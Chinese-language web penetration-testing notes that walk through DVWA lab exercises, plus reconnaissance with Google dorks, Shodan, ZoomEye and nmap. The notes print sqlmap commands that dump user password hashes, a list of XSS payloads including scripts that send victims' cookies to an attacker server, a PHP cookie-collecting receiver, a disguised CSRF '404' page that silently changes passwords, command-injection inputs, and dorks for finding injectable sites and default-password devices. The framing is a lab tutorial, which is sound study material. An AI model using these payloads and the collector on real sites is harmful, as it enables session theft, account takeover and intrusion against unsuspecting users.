如果SQL注入点没有经过登录就可找到,可以直接按照上述方法注入;如果需要登录,肯定不能通过提交方式去登录,因为你也不知道账号密码,所以要通过找cookie(cookie是前端,session是后端)去登录。这也是**SQL注入[中、高],SQL盲注[中、高]**的解决办法。
回到DVWA(需要登录)的SQL注入,随便输入一个错误数字,用火狐插件cookie监视器将这个网址的所有cookie复制下来(复制下来的是冒号,要改成等号),或者可以通过burpsuite抓包拿到cookie,再跑,结果成功渗透。
sqlmap -u "http://192.168.137.146/dvwa/vulnerabilities/sqli/?id=99&Submit=Submit#" --batch --cookie="PHPSESSID=9nfdguaho24opqkkqca6ma4ji0;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" -p id
[16:25:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[16:25:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.137.146'
//先找数据库
sqlmap -u "http://192.168.137.146/dvwa/vulnerabilities/sqli/?id=99&Submit=Submit#" --batch --cookie="PHPSESSID=9nfdguaho24opqkkqca6ma4ji0;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --dbs
available databases [2]:
[*] dvwa
[*] information_schema
//再找表
sqlmap -u "http://192.168.137.146/dvwa/vulnerabilities/sqli/?id=99&Submit=Submit#" --batch --cookie="PHPSESSID=9nfdguaho24opqkkqca6ma4ji0;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" -D dvwa --tables
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
//再找列
sqlmap -u "http://192.168.137.146/dvwa/vulnerabilities/sqli/?id=99&Submit=Submit#" --batch --cookie="PHPSESSID=9nfdguaho24opqkkqca6ma4ji0;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" -D dvwa -T users --columns
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+------------+-------------+
//再找表中数据
sqlmap -u "http://192.168.137.146/dvwa/vulnerabilities/sqli/?id=99&Submit=Submit#" --batch --cookie="PHPSESSID=9nfdguaho24opqkkqca6ma4ji0;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" -D dvwa -T users -C user,password --dump
Database: dvwa
Table: users
[6 entries]
+---------+---------------------------------------------+
| user | password |
+---------+---------------------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123) |
| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| user | ee11cbb19052e40b07aac0ca060c23ee (user) |
+---------+---------------------------------------------+
提权操作,与数据库交互:
sqlmap -u "http://192.168.137.146/dvwa/vulnerabilities/sqli/?id=99&Submit=Submit#" --batch --cookie="PHPSESSID=9nfdguaho24opqkkqca6ma4ji0;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --sql-shell
sql-shell> select user,password from users;
[16:44:30] [INFO] fetching SQL SELECT statement query output: 'select user,password from users'
[16:44:30] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
select user,password from users [6]:
[*] admin, 21232f297a57a5a743894a0e4a801fc3
[*] gordonb, e99a18c428cb38d5f260853678922e03
[*] 1337, 8d3533d75ae2c3966d7e0d4fcc69216b
[*] pablo, 0d107d09f5bbe40cade3de5c71e9e9b7
[*] smithy, 5f4dcc3b5aa765d61d8327deb882cf99
[*] user, ee11cbb19052e40b07aac0ca060c23ee
XSS跨站脚本攻击
以上都是对服务端进行攻击,XSS对客户端进行攻击。
常用的HTML标签
<iframe> iframe元素会创建包含另外一个文档的内联框架
<textarea> <textarea>标签定义多行的文本输入控件
<image> img元素向网页中嵌入一张图片
<script> <script>标签用于定义客户端脚本,如JavaScript
script元素既可以包含脚本语句,也可以通过src属性指向外部脚本文件
必需的type属性规定脚本的MIME类型
JavaScript的常见应用是图像操作,表单验证以及动态内容更新
常用JavaScript方法
alert alert()方法用于显示带有一条指定信息和一个确认按钮的警告框
window.location window.location对象用于获得当前页面的地址,并把浏览器重定向到新的页面
location.href 返回当前显示的文档的完整URL
onload 一张页面或一张图片完成加载
onsubmit 确认按钮被点击
onerror 在加载文档或图片时发生错误
构造XSS脚本
弹框警告
此脚本实现弹框提示,一般作为漏洞测试或者演示使用,类似SQL注入漏洞测试中的单引号',一旦此脚本能执行,也就意味着后端服务器没有对特殊字符(<>/')做过滤,这样就可以证明这个页面位置存在XSS漏洞。
<script>alert("XSS")</script>
<script>alert(document.cookie)</script> <!-弹出cookie->
页面嵌套
<iframe src="http://www.baidu.com" width=300 height=300></iframe>
<iframe src="http://www.baidu.com" width=0 height=0 border=0></iframe> <!-看不见的页面嵌套->
页面重定向
<script>window.location="http://www.baidu.com"</script>
<script>location.href="http://www.baidu.com"</script>
弹框警告并重定向
<script>alert("请移步到我们的新站");location.href="http://www.baidu.com"</script>
<script>alert('XSS');location.href="http://192.168.137.146/dvwa/robots.txt"</script>
这里结合了一些社工的思路,例如通过网站内部私信的方式将其发给其他用户,如果其他用户点击并且相信了这个信息,则可能在另外的站点重新登录账户(克隆网站收集账户)
恶意访问代码
<script src="http://www.baidu.com/xss.js"></script>
<script src="http://BeEF_IP:3000/hook.js"></script> <!-结合BeEF收集用户的cookie->
巧用图片标签
<img src="#" οnerrοr=alert('xss')>
<img src="javascript:alert('xss');">
<img src="http://BeEF_IP:3000/hook.js">
绕开过滤脚本
大小写<ScrIpt>alert('XSS')</SCRipt>
字符编码 采用URL,Base64等编码
<a href="JavaScript:alert;('XSS')">hacker</a> <!-unicode编码->
收集用户cookie
打开新窗口并且采用本地cookie访问目标网页
<script>window.open("http://192.168.137.144/cookie_rec.php?cookie="+document.cookie)</script> //弹窗
<script>document.location="http://192.168.137.144/cookie_rec.php?cookie="+document.cookie</script> //跳转空白页面不弹窗
<script>new Image().src="http://192.168.137.144/cookie_rec.php?cookie="+document.cookie;</script> //不会发觉
<img src="http://192.168.137.144/cookie_rec.php?cookie="+document.cookie> //不能用
<iframe src="'http://192.168.137.144/cookie_rec.php?cookie='+document.cookie"></iframe> //不能用
<script>new Image().src="http://192.168.137.144/cookie_rec.php?cookie="+document.cookie;img.width=0;img.height=0;</script> //不会发觉
XSS反射型
执行弹框:
<script>alert("xss")</script>
//原链接
http://192.168.137.146/dvwa/vulnerabilities/xss_r/
//新链接
http://192.168.137.146/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E#
如果别人登进dvwa后,点进新链接,也会执行弹框。可以执行弹框,那也可以让别人点进链接后将他的cookie发到另一台服务器上。
XSS存储型(危害较大)
kali-BeEF
这是一个留言板,留言板的内容会停留在网页上,如果将恶意代码放在网页上,每个人一访问这个留言板就会中招。
执行弹框:
name:hello
message:<script>alert("xss")</script>
//原链接:
http://192.168.137.146/dvwa/vulnerabilities/xss_s/
//新链接
http://192.168.137.146/dvwa/vulnerabilities/xss_s/
在链接上不会显示什么,但只要一点XSS stored,就会执行弹框。这样称为挂马,把木马挂在了网页上。
访问另一台机器的文件:
<script src="192.168.137.144:3000/hook.js"></script>
XSS反射型[低]
查看源码:
<?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo 'Hello '%20. $_GET['name'];
echo '</pre>';
}
?>
没有做任何过滤。可以利用以上的xss脚本进行操作。
XSS反射型[中]
查看源码:
<?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo 'Hello '%20. str_replace('<script>', '', $_GET['name']);
echo '</pre>';
}
?>
str.replace()会做一个字符串替换,将
<scr<script>ipt>alert("xss")</script>
<ScrIpt>alert('XSS')</SCRipt>
XSS反射型[高]
查看源码:
<?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo 'Hello '%20. htmlspecialchars($_GET['name']);
echo '</pre>';
}
?>
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
XSS存储型[低]
获取cookie,kali作为服务器与攻击机:
构建收集cookie服务器
构造XSS代码植入到web服务器
等待肉鸡触发XSS代码并将cookie发送到服务器
cookie的利用
构建收集cookie服务器:
vim /var/www/html/cookie_rec.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log, $cookie."\n\n");
fclose($log);
?>
给以下目录权限,等下生成的文本文件存进去:
chown -R www-data.www-data /var/www/
通过渗透机植入XSS代码:
<script>window.open('http://192.168.137.144/cookie_rec.php?cookie='+document.cookie)</script>
注:要先清除之前植入的XSS代码
在XSS存储型网页中,发现前端限制留言长度,直接在前端修改最大长度即可。当用户点进XSS存储型时,会显示弹窗,用户的cookie信息就会收集在服务器上。但现在很多浏览器都会拦截弹窗,所以弄一个不会弹窗的:
<script>new Image().src="http://192.168.137.144/cookie_rec.php?cookie="+document.cookie;</script>
用户几乎不会发觉cookie被盗
XSS存储型[中]
查看源码:
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']);
// Sanitize message input
$message = trim(strip_tags(addslashes($message)));
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = str_replace('<script>', '', $name);
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>'%20. mysql_error() . '</pre>'%20);
}
?>
可知message用了 htmlspecialchars() 函数,暂时不知道怎么利用,但name没有用,所以可以将恶意代码写进name里面。
XSS存储型[高]
查看源码:
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = stripslashes($name);
$name = mysql_real_escape_string($name);
$name = htmlspecialchars($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>'%20. mysql_error() . '</pre>'%20);
}
?>
name和message都用htmlspecialchars()规定了,所以不能在这攻击了。
自动化XSS
BeEF
启动Apache和BeEF:
service apache2 start
cd /usr/share/beef-xss
./beef
启动BeEF会自动生成代码和服务器。账号密码保存在/etc/beef-xss/config.yaml
用户点进XSS存储型后几乎不会发觉木马,BeEF除了能拿到用户的cookie还能实行很多功能。
命令颜色
绿色 对目标主机生效并且不可见(不会被发现)
灰色 对目标主机未必生效(可验证一下)
橙色 对目标主机生效但可能可见(可能被发现)
红色 对目标主机不生效
CSRF(跨站请求伪造)[低]
CSRF是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。
CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
查看源码:
<?php
if (isset($_GET['Change'])) {
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if (($pass_new == $pass_conf)){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
$result=mysql_query($insert) or die('<pre>'%20. mysql_error() . '</pre>'%20);
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match. </pre>";
}
}
?>
这个修改密码竟然是$_GET请求,说明密码会在url上显示。如果用户点击以下链接,他的密码就会改成123。
http://192.168.137.146/dvwa/vulnerabilities/csrf/?password_new=abc&password_conf=abc&Change=Change#
可以用短链接的方法隐藏真实的URL,这样就不容易从链接上看出来修改了密码。
也可以制造一个攻击页面。在本机做一个页面getf.html处理
Getf.html页面代码:
<img src="http://192.168.137.146/dvwa/vulnerabilities/csrf/?password_new=abc&password_conf=abc&Change=Change#" border=0 style="display:none;">
<h1>404</h1>
<h2>not found</h2>
把上面链接放在公网某个地址,当用户点击这个链接后,客户可能以为访问了一个失效页面,这样就神不知鬼不觉地修改了用户密码。
CSRF[中]
<?php
if (isset($_GET['Change'])) {
// Checks the http referer header
if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if ($pass_new == $pass_conf){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
$result=mysql_query($insert) or die('<pre>'%20. mysql_error() . '</pre>'%20);
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match. </pre>";
}
}
}
?>
eregi()函数在一个字符串搜索指定的模式的字符串。搜索不区分大小写。源码意思是验证HTTP_REFERER是否是127.0.0.1,判断请求的来源是否是本机,可以通过Burp Suite抓包,然后修改Reffer的值,只要包含127.0.0.1就可以实现修改,甚至可以只是127.0.0.1这个值。
CSRF[高]
<?php
if (isset($_GET['Change'])) {
// Turn requests into variables
$pass_curr = $_GET['password_current'];
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
// Sanitise current password input
$pass_curr = stripslashes( $pass_curr );
$pass_curr = mysql_real_escape_string( $pass_curr );
$pass_curr = md5( $pass_curr );
// Check that the current password is correct
$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
$result = mysql_query($qry) or die('<pre>'%20. mysql_error() . '</pre>'%20);
if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
$result=mysql_query($insert) or die('<pre>'%20. mysql_error() . '</pre>'%20);
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match or current password incorrect. </pre>";
}
}
?>
这个在修改密码前要输入原密码,如果不知道原密码,就不能搞了。
不安全验证码[低]
CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。 简单来说是验证码的意思。
reCAPTCHA API key NULL in config file.
Please register for a key from reCAPTCHA at [https://www.google.com/recaptcha/admin/create](http://hiderefer.com/?https://www.google.com/recaptcha/admin/create) and set the key in the file /owaspbwa/dvwa-svn/config/config.inc.php
进入这个页面要很长时间,我猜是因为它去访问谷歌拿验证码了。它说要去 https://www.google.com/recaptcha/admin/create 注册密钥再把它放进服务器目录 /owaspbwa/dvwa-svn/config/config.inc.php 里。由于没有科学上网,我就不弄了。
先来看下源码:
<?php
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '1'%20) ) {
$hide_form = true;
$user = $_POST['username'];
$pass_new = $_POST['password_new'];
$pass_conf = $_POST['password_conf'];
$resp = recaptcha_check_answer ($_DVWA['recaptcha_private_key'],
$_SERVER["REMOTE_ADDR"],
$_POST["recaptcha_challenge_field"],
$_POST["recaptcha_response_field"]);
if (!$resp->is_valid) {
// What happens when the CAPTCHA was entered incorrectly
echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
} else {
if (($pass_new == $pass_conf)){
echo "<pre><br />You passed the CAPTCHA! Click the button to confirm your changes. <br /></pre>";
echo "
<form action=\"#\" method=\"POST\">
<input type=\"hidden\" name=\"step\" value=\"2\" />
<input type=\"hidden\" name=\"password_new\" value=\"" . $pass_new . "\" />
<input type=\"hidden\" name=\"password_conf\" value=\"" . $pass_conf . "\" />
<input type=\"submit\" name=\"Change\" value=\"Change\" />
</form>";
}
else{
echo "<pre> Both passwords must match </pre>";
$hide_form = false;
}
}
}
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '2'%20) )
{
$hide_form = true;
if ($pass_new != $pass_conf)
{
echo "<pre><br />Both passwords must match</pre>";
$hide_form = false;
return;
}
$pass = md5($pass_new);
if (($pass_new == $pass_conf)){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result=mysql_query($insert) or die('<pre>'%20. mysql_error() . '</pre>'%20);
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match. </pre>";
}
}
?>
很清楚看到,整个修改密码过程分为两步,第一步是验证验证码是否正确,第二步是修改密码。我们可以通过抓包直接将step修改为2跳过验证。
不安全验证码[中]
<?php
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '1'%20) ) {
$hide_form = true;
$user = $_POST['username'];
$pass_new = $_POST['password_new'];
$pass_conf = $_POST['password_conf'];
$resp = recaptcha_check_answer($_DVWA['recaptcha_private_key'],
$_SERVER["REMOTE_ADDR"],
$_POST["recaptcha_challenge_field"],
$_POST["recaptcha_response_field"]);
if (!$resp->is_valid) {
// What happens when the CAPTCHA was entered incorrectly
echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
} else {
if (($pass_new == $pass_conf)){
echo "<pre><br />You passed the CAPTCHA! Click the button to confirm your changes. <br /></pre>";
echo "
<form action=\"#\" method=\"POST\">
<input type=\"hidden\" name=\"step\" value=\"2\" />
<input type=\"hidden\" name=\"password_new\" value=\"" . $pass_new . "\" />
<input type=\"hidden\" name=\"password_conf\" value=\"" . $pass_conf . "\" />
<input type=\"hidden\" name=\"passed_captcha\" value=\"true\" />
<input type=\"submit\" name=\"Change\" value=\"Change\" />
</form>";
}
else{
echo "<pre> Both passwords must match </pre>";
$hide_form = false;
}
}
}
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '2'%20) )
{
$hide_form = true;
if (!$_POST['passed_captcha'])
{
echo "<pre><br />You have not passed the CAPTCHA. Bad hacker, no doughnut.</pre>";
$hide_form = false;
return;
}
$pass = md5($pass_new);
if (($pass_new == $pass_conf)){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result=mysql_query($insert) or die('<pre>'%20. mysql_error() . '</pre>'%20);
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Passwords did not match. </pre>";
}
}
?>
在第二步可以看到多了一个if语句用来验证验证码,要求 $_POST[‘passed_captcha’]为真。只要在修改包的时候多添加一个参数passed_captcha=true即可。
不安全验证码[高]
<?php
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '1'%20) ) {
$hide_form = true;
$pass_new = $_POST['password_new'];
$pass_new = stripslashes( $pass_new );
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
$pass_conf = $_POST['password_conf'];
$pass_conf = stripslashes( $pass_conf );
$pass_conf = mysql_real_escape_string( $pass_conf );
$pass_conf = md5( $pass_conf );
$resp = recaptcha_check_answer ($_DVWA['recaptcha_private_key'],
$_SERVER["REMOTE_ADDR"],
$_POST["recaptcha_challenge_field"],
$_POST["recaptcha_response_field"]);
if (!$resp->is_valid) {
// What happens when the CAPTCHA was entered incorrectly
echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
} else {
// Check that the current password is correct
$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
$result = mysql_query($qry) or die('<pre>'%20. mysql_error() . '</pre>'%20);
if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
$insert="UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result=mysql_query($insert) or die('<pre>'%20. mysql_error() . '</pre>'%20);
echo "<pre> Password Changed </pre>";
mysql_close();
}
else{
echo "<pre> Either your current password is incorrect or the new passwords did not match. Please try again. </pre>";
}
}
}
?>
这种加上原密码再加上验证基本很难攻击。
命令执行漏洞[低]
查看源码:
<?php
if( isset( $_POST[ 'submit'%20] ) ) {
$target = $_REQUEST[ 'ip'%20];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping '%20. $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 '%20. $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
这段代码相当于cmd的ping功能:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.008 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.022 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.019 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2011ms
rtt min/avg/max/mdev = 0.008/0.016/0.022/0.006 ms
但如果利用合并命令,可以执行ping以外的其他功能,例如127.0.0.1&&pwd:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.008 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.017 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.017 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2019ms
rtt min/avg/max/mdev = 0.008/0.014/0.017/0.004 ms
/owaspbwa/dvwa-git/vulnerabilities/exec
pwd 命令用作显示工作目录的路径名称 。
windows或linux下
command1 && command2 先执行1再执行2
command1 || command2 先执行1,1为假再执行2
command1 & command2 先执行2再执行1
command1 | command2 只执行2
命令执行漏洞[中]
查看源码:
<?php
if( isset( $_POST[ 'submit'] ) ) {
$target = $_REQUEST[ 'ip'%20];
// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&'%20=> '',
';'%20=> '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping '%20. $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 '%20. $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
代码是将&&和;都替换成空,但我们可以用||,只要前面条件为假,就执行后面的命令。例如:hello || ls
help
index.php
source
命令执行漏洞[高]
<?php
if( isset( $_POST[ 'submit'%20] ) ) {
$target = $_REQUEST["ip"];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode(".", $target);
// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping '%20. $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 '%20. $target );
echo '<pre>'.$cmd.'</pre>';
}
}
else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}
}
?>
对获取的ip值,先去下划线处理,然后根据’.’来分成数组,判断是否分成四份且每一份是数字的,然后还原回去,对ip值进行ping操作,否则判定输入ip值为非法ip格式。经过这样的处理,输入的只能是ip格式的参数,确保了执行输入参数的安全性。
WEB信息收集
信息搜集之搜索引擎
1. Google Hacking
1.1 site
功能:搜索指定的域名的网页内容,可以用来搜索子域名、跟此域名相关的内容。
site:zhihu.com 搜索跟zhihu.com相关的网页
"web安全" site:zhihu.com 搜索zhihu.com跟web安全相关的内容
"sql注入" site:csdn.net 在csdn.net搜索跟SQL注入相关的内容
"教程" site:pan.baidu.com 在百度盘搜索教程
1.2 filetype
功能:搜索指定文件类型
"web安全" filetype:pdf 搜索跟web安全有关的pdf文件
namp filetype:ppt 搜索跟nmap相关的ppt文件
site:csdn.net filetype:pdf 搜索csdn网站中的pdf文件
1.3 inurl
功能:搜索url网址存在特定关键字的网页,可以用来搜寻有注入点的网站
inurl:.php?id= 搜索网址中有".php?id="的网页
inurl:view.php=? 搜索网址中有"view.php=?"的网页
inurl:.jsp?id= 搜索网址中有".jsp?id="的网页
inurl:.asp?id= 搜索网址中有".asp?id="的网页
inurl:/admin/login.php 搜索网址中有"/admin/login.php"的网页
inurl:login 搜索网址中有"login"的登录网页
1.4 intitle
功能:搜索标题存在特点关键字的网页
intitle:后台登录 搜索网页标题是"后台登录"的网页
intitle:后台管理 filetype:php 搜索网页标题是"后台管理"的php页面
intitle:index of "parent directory" 搜索根目录相关的索引目录信息
1.5 intext
功能:搜索正文存在特定关键字的网页
intext:powered by Discuz 搜索Discuz论坛相关的页面
intext:powered by wordpress 搜索wordpress制作的博客网址
intext:powered by *CMS 搜索基于*CMS的网址,CMS是内容管理系统,建站系统
intext:powered by xxx inurl:login 搜索此类网址的后台登录页面
1.6 符号
-keyword 强制结果不要出现此关键字,例如:电影 -黑客
*keyword 模糊搜索,强制结果包含此关键字,例如:电影 一个叫*决定*
"keyword" 强制搜索结果整体出现此关键字,例如:书籍 "web安全"
1.7 参考
例:搜纽约时报网站(nytimes.com)在2008年到2010年关于大学(college)测验分数(test scores)但不是SAT入学分数的文章。
site:nytimes.com ~college "test scores" -SATs 2008..2010
site:nytimes.com //只搜索某个网站的页面
~college //同时搜索近义词比如university,higher education
"test scores" //整体作为关键词
-SATs //排除SATs
2008..2010 //显示指定年份时间段内的搜索结果
1.8 快捷键
Ctrl + F 想要在页面中查找某关键字的位置
Ctrl + +/-/0 放大、缩小页面,0是回到100%
Ctrl + L 选中页面中的地址栏
Ctrl + Tab 切换标签页
Alt + Tab 切换窗口
2. Shodan Hacking
http://www.shodan.io
Shodan(撒旦搜索引擎)被称为“最可怕的搜索引擎”,可扫描一切联网的设备。除了常见的web服务器,还能扫描防火墙、路由器、交换机、摄像头、打印机等一切联网设备。
2.1 ip
114.114.114.114
2.2 service/protocol
http
http country:"DE" 使用高级搜索要注册登录才能搜索
http product:"Apache httpd"
ssh
ssh default password
ssh default password country:"JP" city:"Tokyo"
2.3 keyword
基于关键词搜索的思路是根据banner(设备指纹)来搜索
"default password" country:"TH"
FTP anon successful
2.4 product
product:"Microsoft IIS httpd"
product:"nginx"
product:"Apache httpd"
product:MySQL
2.5 version
product:MySQL version:"5.1.73"
product:"Microsoft IIS httpd" version:"7.5"
2.6 hostname
hostname:.org
hostname:.edu
2.7 os
os:"Windows Server 2008 R2"
os:"Windows 7 or 8"
os:"Linux 2.6.x"
2.8 net
net:110.180.13.0/24
200 ok net:110.180.13.0/24
200 ok country:JP net:110.180.13.0/24
2.9 port
port:3389
port:445
port:22
远程桌面连接mstsc,好像要Win10专业版才行。
3. Zoomeye Hacking
https://www.zoomeye.org
ZoomEye(钟馗之眼)是一个面向网络空间的搜索引擎,“国产的shodan”。
ip ip:35.185.77.2
os os:linux
app app:Apache httpd
service service:routersetup 公网路由器
port port:3389
country country:cn
city country:cn +city:hangzhou
ver app:Apache httpd +ver:2.2.16
cidr cidr:35.185.77.2/24 IP的CIDR网段
hostname hostname:google.com
site
title
header
keywords
desc
用户手册:https://www.zoomeye.org/help
信息收集之目标扫描
1. nmap
nmap是安全渗透领域最强大的开源端口扫描器,能跨平台支持运行。
https://nmap.org
http://sectools.org
1.1 扫描示例
主机发现 nmap -sn 192.168.137.144/24
端口扫描 nmap -sS -p1-1000 192.168.137.144
系统扫描 nmap -O 192.168.137.144
网络服务扫描 nmap -sV 192.168.137.144
综合扫描 nmap -A 192.168.137.144
脚本扫描 /usr/share/nmap/scripts
nmap --script=default 192.168.137.144
nmap --script=auth 192.168.137.144
nmap --script=brute 192.168.137.144
nmap --script=vuln 192.168.137.144
nmap --script=broadcast 192.168.137.144
nmap --script=smb-brute.nse 192.168.137.144
nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.144
nmap --script=smb-vuln-conficker.nse --script-args=unsafe=1 192.168.137.144
nmap -p3306 --script=mysql-empty-password.nse 192.168.137.144
UDP、ICMP首部长度8byte,TCP、IP首部长度20byte
2. zenmap
图形化nmap
nmap T4 -A -v 192.168.137.144
-T 设置速度等级,1-5级,数字越大速度越快
-A 综合扫描
-v 输出扫描过程
3. OpenVAS
开放式漏洞评估系统,是一个用于评估目标漏洞的杰出框架,开源且功能十分强大。
http://www.openvas.org
http://www.greenbone.net
不装了这能装一天。。下面给个安装教程吧
升级kali
apt-get update
apt-get dist-upgrade
安装OpenVAS
apt-get install openvas
openvas-setup
修改admin账户密码
openvasmd --user=admin --new-password=password
启动openvas
openvas-start
检查安装,一定要先启动再检查
ss -tnlp
openvas-check-setup
登录openvas
https://192.168.137.144:9392
WEB漏洞扫描
WEB漏洞扫描之AWVS
通过网络爬虫测试你的网站安全,检测流行安全漏洞
1. 网站扫描
http://testhtml5.vulnweb.com
WEB漏洞扫描之AppScan
WEB漏洞扫描之BurpSuite
burpsuite专业版才能扫描
1. 功能及特点
target 目标模块用于设置扫描域、生成站点地图、生成安全分析
proxy 代理模块用于拦截浏览器的http会话内容
spider 爬虫模块用于自动爬取网站的每个页面内容,并生成完成的网站地图
